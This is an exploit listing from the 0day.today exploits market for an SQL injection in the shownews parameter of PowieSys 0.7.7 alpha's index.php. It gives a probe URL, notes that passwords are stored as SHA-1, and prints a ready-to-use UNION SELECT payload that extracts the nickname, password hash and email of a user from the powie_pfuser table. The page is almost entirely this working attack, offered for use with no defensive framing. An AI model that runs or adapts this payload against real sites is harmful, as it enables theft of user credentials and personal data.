[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vuln

Author
Easy Laster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9664
Category
web applications
Date add
21-03-2010
Platform
unsorted
========================================================================
PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vulnerability
========================================================================

----------------------------Information------------------------------------------------
+Name : PowieSys <=  0.7.7 alpha index.php (shownews) SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 22.03.2010
+Script  : PowieSys <= 0.7.7 alpha
+Download : http://www.powie.de/cms/filedb/download.php?id=127
+Price : for free
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/news/index.php?shownews='
 
The password is a SHA-1
 
+Exploitable   : http://www.site.com/news/index.php?shownews=999999'+union+select+1,2,3,
4,concat(nickname,0x3a,pwd,0x3a,email),6,7,8,9,10,11,12,13+from+powie_pfuser+where+id=1--+
 
-----------------------------------------------------------------------------------------



#  0day.today [2024-12-24]  #